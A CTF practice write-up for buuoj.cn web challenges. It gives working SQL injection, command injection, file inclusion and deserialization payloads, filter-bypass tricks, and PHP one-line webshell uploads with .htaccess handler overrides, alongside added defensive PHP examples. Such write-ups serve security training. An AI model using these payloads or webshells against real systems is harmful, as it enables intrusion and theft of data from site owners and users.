CTF Practice - buuoj.cn

Published: 2023-06-26 13:17:38 Author: admax11

CTF Practice

WEB

buuoj.cn-[极客大挑战 2019]EasySQL

Universal formulas (always-true conditions)

1 and 1=1
1' and '1'='1
1 or 1=1 
1' or '1'='1

http://43ffd150-ad6f-4a6f-bfe1-09e4486466fd.node4.buuoj.cn:81/check.php?username=1'or '1'='1&password=1'or '1'='1

[极客大挑战 2019]Havefun

Right-click and view the page source.

               <!--
        $cat=$_GET['cat'];
        echo $cat;
        if($cat=='dog'){
            echo 'Syc{cat_cat_cat_cat}';
        }
        -->

http://1c4bde13-b1bc-47b9-a000-2a2ab8f02b70.node4.buuoj.cn:81/?cat=dog

[HCTF 2018]WarmUp

A simple PHP code audit.

<?php
    highlight_file(__FILE__);
    class emmm
    {
        public static function checkFile(&$page)
        {
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
            if (! isset($page) || !is_string($page)) {
                echo "you can't see it";
                return false;
            }
 
            if (in_array($page, $whitelist)) {
                return true;
            }
 
            $_page = mb_substr(
                $page,
                0,
                mb_strpos($page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }
 
            $_page = urldecode($page);
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }
            echo "you can't see it";
            return false;
        }
    }
 
    if (! empty($_REQUEST['file'])
        && is_string($_REQUEST['file'])
        && emmm::checkFile($_REQUEST['file'])
    ) {
        include $_REQUEST['file'];
        exit;
    } else {
        echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
    }  
?>

payload:

62704325-c9b0-4e15-bdad-cc1495651f9c.node4.buuoj.cn:81/?file=hint.php?../../../../../../../../ffffllllaaaagggg

Reference:

https://blog.csdn.net/qq_63548648/article/details/128067255

[ACTF2020 新生赛]Include

File inclusion:

http://feadec16-bcf9-4fcf-a5e0-0df54c397f7b.node4.buuoj.cn:81/?file=php://filter/convert.base64-encode/resource=flag.php

index.php source:

<meta charset="utf8">
<?php
error_reporting(0);
$file = $_GET["file"];
if(stristr($file,"php://input") || stristr($file,"zip://") || stristr($file,"phar://") || stristr($file,"data:")){
	exit('hacker!');
}
if($file){
	include($file);
}else{
	echo '<a href="?file=flag.php">tips</a>';
}
?>

File inclusion reference:

https://www.anquanke.com/post/id/248627#h3-11
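
WarmUp and Include both validate the raw `file` string and then hand that same string to `include`, so whatever survives the string check reaches the filesystem or a stream wrapper. A defensive alternative, added here as an example (not code from either challenge; `resolvePage` and the `PAGES` map are hypothetical names): use the parameter only as a lookup key and include a fixed path from a map. It needs PHP 8.0 or later for the `mixed` type.

```php
<?php
declare(strict_types=1);

// Hypothetical allowlist: request key => fixed file name in the application directory.
const PAGES = [
    'source' => 'source.php',
    'hint'   => 'hint.php',
];

/**
 * Return the absolute path to include for a request value, or null to refuse.
 * The request value is only ever used as an array key, never as part of a path.
 */
function resolvePage(mixed $requested, string $baseDir): ?string
{
    if (!is_string($requested) || !array_key_exists($requested, PAGES)) {
        return null;
    }
    return rtrim($baseDir, '/') . '/' . PAGES[$requested];
}

// Constructed sample inputs, including the two request values shown on this page.
$samples = [
    'hint',
    'hint.php?../../../../../../../../ffffllllaaaagggg',
    'php://filter/convert.base64-encode/resource=flag.php',
    ['hint'], // arrays arrive from query strings such as ?file[]=hint
];

foreach ($samples as $value) {
    $path = resolvePage($value, __DIR__);
    // A real handler would call `include $path;` only when $path is not null.
    printf(
        "%-62s => %s\n",
        json_encode($value, JSON_UNESCAPED_SLASHES),
        $path ?? 'refused'
    );
}
```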

[ACTF2020 新生赛]Exec

Command execution

127.0.0.1;cat /flag

[GXYCTF2019]Ping Ping Ping

http://a37a6ef7-4016-40f4-91e2-e6d51c6a6d52.node4.buuoj.cn:81/?ip=127.0.0.1|cat$IFS$1index.php

index.php source:

<?php
if(isset($_GET['ip'])){
  $ip = $_GET['ip'];
  if(preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{1f}]|\>|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match)){
    echo preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{20}]|\>|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match);
    die("fxck your symbol!");
  } else if(preg_match("/ /", $ip)){
    die("fxck your space!");
  } else if(preg_match("/bash/", $ip)){
    die("fxck your bash!");
  } else if(preg_match("/.*f.*l.*a.*g.*/", $ip)){
    die("fxck your flag!");
  }
  $a = shell_exec("ping -c 4 ".$ip);
  echo "<pre>";
  print_r($a);
}

?>

Method 1:

Variable concatenation:
    
http://a37a6ef7-4016-40f4-91e2-e6d51c6a6d52.node4.buuoj.cn:81/?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php

Method 2:

Base64 encoding bypass:

echo "cat flag.php"|base64

Generated base64: Y2F0IGZsYWcucGhwCg==

http://a37a6ef7-4016-40f4-91e2-e6d51c6a6d52.node4.buuoj.cn:81/?ip=127.0.0.1|echo$IFS$1Y2F0IGZsYWcucGhwCg==$IFS$1|$IFS$1base64$IFS$1-d$IFS$1|$IFS$1sh

Reference articles on command-execution bypass techniques:

https://blog.csdn.net/m0_64815693/article/details/127268809

http://www.360doc.com/content/21/0909/17/71923083_994810060.shtml
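
The filter in the Ping Ping Ping index.php is a denylist, and the requests above get through it with characters it does not list. A defensive rewrite, added here as an example (not the challenge's code; `denylistAccepts` and `buildPingCommand` are hypothetical names): accept only a syntactically valid IP address and quote it before it reaches the shell. The script only builds the command string and never runs it.

```php
<?php
declare(strict_types=1);

/** The challenge's denylist, patterns copied from index.php above. True means accepted. */
function denylistAccepts(string $ip): bool
{
    if (preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{1f}]|\>|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip)) {
        return false;
    }
    return !preg_match("/ /", $ip)
        && !preg_match("/bash/", $ip)
        && !preg_match("/.*f.*l.*a.*g.*/", $ip);
}

/** Allowlist version: returns the command to run, or null if the input is not an IP. */
function buildPingCommand(string $ip): ?string
{
    if (filter_var($ip, FILTER_VALIDATE_IP) === false) {
        return null;
    }
    // escapeshellarg() is defence in depth: a validated IP has no shell metacharacters.
    return 'ping -c 4 ' . escapeshellarg($ip);
}

// Constructed inputs: a normal address plus two request values shown on this page.
$samples = [
    '127.0.0.1',
    '127.0.0.1|cat$IFS$1index.php',
    '127.0.0.1;a=g;cat$IFS$1fla$a.php',
];

foreach ($samples as $ip) {
    printf(
        "%-36s denylist: %-9s allowlist: %s\n",
        $ip,
        denylistAccepts($ip) ? 'accepted' : 'rejected',
        buildPingCommand($ip) ?? 'rejected'
    );
}
```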

[SUCTF 2019]EasySQL

First method:

1;set sql_mode=PIPES_AS_CONCAT;select 1

Second method:

*,1

[极客大挑战 2019]Secret File

Simple file inclusion

http://b0072723-9ac4-4df9-a175-77d60e59735a.node4.buuoj.cn:81/Archive_room.php

Capture the traffic with Burp Suite:

/secr3t.php

Simple PHP file inclusion

 /secr3t.php?file=php://filter/convert.base64-encode/resource=flag.php 

[极客大挑战 2019]LoveSQL

Note: encode # as %23.

/check.php?username=1' union select 1,database(),version()%23&password=1

/check.php?username=1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()%23&password=1
    
/check.php?username=1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='l0ve1ysq1'%23&password=1

/check.php?username=1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1%23&password=1

[极客大挑战 2019]Http

Modifying the HTTP request headers

X-Forwarded-For: 127.0.0.1
Referer: https://Sycsecret.buuoj.cn
User-Agent: "Syclover" browser

Request headers sent:

GET /Secret.php HTTP/1.1
Host: node4.buuoj.cn:26614
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache
X-Forwarded-For: 127.0.0.1
Referer: https://Sycsecret.buuoj.cn
User-Agent:  "Syclover" browser

[极客大挑战 2019]Knife

A no-brainer challenge: just connect with China Chopper or another webshell management tool.

[极客大挑战 2019]Upload

File header (magic bytes) bypass

GIF89a

Bypass using the phtml file extension

Content-Disposition: form-data; name="file"; filename="flag.phtml"
Content-Type: image/png

GIF89a
<script language='php'>@eval($_POST[shell]);</script>

Shell connection address: upload/flag.phtml

[ACTF2020 新生赛]Upload

http://684e6a4c-d084-42d7-b3c7-419234cc452a.node4.buuoj.cn:81/uplo4d/336ac026f4ef15045c8cf2d5f92245ad.phtml

Upload a phtml file

POST / HTTP/1.1
Host: 684e6a4c-d084-42d7-b3c7-419234cc452a.node4.buuoj.cn:81
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------145469643534879765234084248244
Content-Length: 402
Origin: http://684e6a4c-d084-42d7-b3c7-419234cc452a.node4.buuoj.cn:81
Connection: close
Referer: http://684e6a4c-d084-42d7-b3c7-419234cc452a.node4.buuoj.cn:81/
Upgrade-Insecure-Requests: 1

-----------------------------145469643534879765234084248244
Content-Disposition: form-data; name="upload_file"; filename="1111.phtml"
Content-Type: image/jpeg


<script language='php'>@eval($_POST[shell]);</script>
-----------------------------145469643534879765234084248244
Content-Disposition: form-data; name="submit"

upload
-----------------------------145469643534879765234084248244--

[极客大挑战 2019]BabySQL

Double-write bypass (each filtered keyword is written twice)

username=admin&password=123456' ununionion selselectect 1,2,3 %23

username=admin&password=123456' ununionion selselectect 1,2,database() %23

username=admin&password=123456' ununionion selselectect 1,2,group_concat(schema_name)  from  information_schema.schemata %23

admin&password=123456' ununionion selselectect 1,2,group_concat(schema_name)  frfromom  (infoorrmation_schema.schemata) %23

username=admin&password=123456' ununionion selselectect 1,2,group_concat(table_name)  frfromom  (infoorrmation_schema.tables) whwhereere table_schema='ctf' %23

username=admin&password=123456' ununionion selselectect 1,2,group_concat(column_name)  frfromom  (infoorrmation_schema.columns) whwhereere table_schema='ctf' and table_name='Flag' %23

username=admin&password=123456' ununionion selselectect 1,2,group_concat(column_name)  frfromom  (infoorrmation_schema.columns) whwhereere table_schema='ctf' aandnd table_name='Flag' %23

username=admin&password=123456' ununionion selselectect 1,2,flag  frfromom  ctf.Flag %23
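
The doubled keywords above survive a filter that deletes keywords in a single pass, because removing the inner copy joins the outer halves back into the keyword. The sketch below is an added example, not the challenge's source: `stripKeywords`, its keyword list and the `users` table are assumptions. It contrasts that filter with a parameterized login on an in-memory SQLite database (requires the pdo_sqlite extension).

```php
<?php
declare(strict_types=1);

/** Assumed single-pass keyword filter of the kind that doubled keywords defeat. */
function stripKeywords(string $input): string
{
    return str_ireplace(['union', 'select', 'from', 'where', 'or', 'and'], '', $input);
}

/** Login with a bound parameter: the user name is data, never SQL text. */
function login(PDO $db, string $user, string $pass): bool
{
    $stmt = $db->prepare('SELECT password_hash FROM users WHERE username = ?');
    $stmt->execute([$user]);
    $hash = $stmt->fetchColumn();
    return is_string($hash) && password_verify($pass, $hash);
}

// Constructed in-memory database with one sample account.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (username TEXT PRIMARY KEY, password_hash TEXT NOT NULL)');
$db->prepare('INSERT INTO users VALUES (?, ?)')
   ->execute(['admin', password_hash('correct-horse', PASSWORD_DEFAULT)]);

// Inputs taken from this page (URL-decoded): the doubled-keyword value from BabySQL
// and the always-true string from EasySQL.
$doubled    = "123456' ununionion selselectect 1,2,3 #";
$alwaysTrue = "1' or '1'='1";

// What the assumed filter would hand to a string-concatenated query.
echo 'filter output: ', stripKeywords($doubled), "\n";

// With bound parameters the same strings are ordinary values that match no account.
$attempts = [
    ['admin', 'correct-horse'],
    ['admin', $doubled],
    [$alwaysTrue, $alwaysTrue],
];
foreach ($attempts as [$user, $pass]) {
    printf("%-16s / %-42s => %s\n", $user, $pass, login($db, $user, $pass) ? 'ok' : 'denied');
}
```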

[极客大挑战 2019]PHP

A deserialization challenge.

Key points: website backup + __wakeup bypass

Mind the whitespace: use %00 to get around it.

http://bc2f74ae-5a22-4516-91f4-c0a3620d0016.node4.buuoj.cn:81/?select=O:4:%22Name%22:3:{s:14:%22%00Name%00username%22;s:5:%22admin%22;s:14:%22%00Name%00password%22;i:100;}

Reference: https://blog.csdn.net/qq_58166735/article/details/128248384

[ACTF2020 新生赛]BackupFile

Key points: finding backup files + PHP loose type comparison

Backup file: index.php.bak

http://89295bcb-1c0e-4e2b-a068-42add2e5e913.node4.buuoj.cn:81/index.php?key=123

[RoarCTF 2019]Easy Calc

Checking phpinfo shows that most functions are disabled.

The functions var_dump() and scandir() are used below to get around this.

? num=var_dump(scandir(chr(47)))

num=file_get_contents(/f1agg) is converted to:

num=file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103))

Use Python to convert the string into ASCII character codes, bypassing the WAF's restrictions on letters and digits.

str1 = "/f1agg"
flag = ""
for char in str1:
    flag += "chr("+str(ord(char))+")."
    
print(flag.rstrip('.'))

Reference:

https://blog.csdn.net/m0_62905261/article/details/127027095

[极客大挑战 2019]BuyFlag

Key point: bypassing is_numeric()

Source:

if (isset($_POST['password'])) {
	$password = $_POST['password'];
	if (is_numeric($password)) {
		echo "password can't be number</br>";
	}elseif ($password == 404) {
		echo "Password Right!</br>";
	}
}

POST /pay.php HTTP/1.1
Host: 446f2935-4a7a-4da6-accf-a706b6f11595.node4.buuoj.cn:81
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: user=1
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 23

password=404e&money[]=a

[BJDCTF2020]Easy MD5

Key points: MD5 array bypass, hash collision bypass, loose type comparison bypass.

Reference:

https://blog.csdn.net/qq_63548648/article/details/128144485

[护网杯 2018]easy_tornado

Key point: template injection

http://dc5b7c5b-d2b9-4b00-b377-158930237bf4.node4.buuoj.cn:81/file?filename=/fllllllllllllag&filehash=1ec3c5246db838c2a99140811cd344b8

Reference: https://blog.csdn.net/qq_51927659/article/details/116031923

[HCTF 2018]admin

Key points: Unicode spoofing, Flask session forgery, race condition

https://blog.csdn.net/qq_63928796/article/details/125637749

[MRCTF2020]你传你?呢

Key points: file upload, use of the .htaccess file

.htaccess file

<FilesMatch "1.png">
SetHandler application/x-httpd-php
</FilesMatch>

Upload any image, change its content to PHP by writing a one-line webshell into it, then connect to the shell to get the flag.
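
The three upload challenges ([极客大挑战 2019]Upload, [ACTF2020 新生赛]Upload and this one) work because the server keeps the client's file name and extension (`.phtml`, `.htaccess`) and trusts the `Content-Type` header or a `GIF89a` prefix, all of which the client controls. An added example of a stricter check, not taken from any of the challenges (`safeUploadName` and the extension list are assumptions): the server accepts only allowlisted extensions and chooses the stored name itself.

```php
<?php
declare(strict_types=1);

// Assumed allowlist of extensions the application is willing to store.
const ALLOWED_EXTENSIONS = ['png', 'jpg', 'jpeg', 'gif'];

/**
 * Return a server-generated file name for an upload, or null to refuse it.
 * Only the final extension of the client name is used, and only if allowlisted.
 * The Content-Type header and leading magic bytes are ignored: the client sets both.
 */
function safeUploadName(string $clientName): ?string
{
    // Drop any directory part, whichever separator the client used.
    $base = basename(str_replace('\\', '/', $clientName));
    if ($base === '' || $base[0] === '.') {
        return null; // refuses .htaccess and other dotfiles
    }
    $ext = strtolower(pathinfo($base, PATHINFO_EXTENSION));
    if (!in_array($ext, ALLOWED_EXTENSIONS, true)) {
        return null; // refuses .phtml, .php and anything else not listed
    }
    // The random name means the uploader cannot choose or predict the stored path.
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

// File names from this page plus one constructed benign name (cat.PNG).
foreach (['cat.PNG', 'flag.phtml', '1111.phtml', '.htaccess', '1.png'] as $name) {
    printf("%-12s => %s\n", $name, safeUploadName($name) ?? 'refused');
}
```

Name checks are only half of the control: the upload directory should also sit outside the web root or have script handlers and per-directory overrides (`AllowOverride None` in Apache) disabled.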

[ZJCTF 2019]NiZhuanSiWei

Key points: PHP stream wrappers (pseudo-protocols), PHP deserialization

http://d725a3cd-5e90-48b6-ac58-f7b643407b5e.node4.buuoj.cn:81/?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=&file=useless.php&password=O:4:%22Flag%22%3A1%3A%7Bs%3A4%3A%22file%22%3Bs%3A8%3A%22flag.php%22%3B%7D

Reference: https://blog.csdn.net/wo41ge/article/details/109705195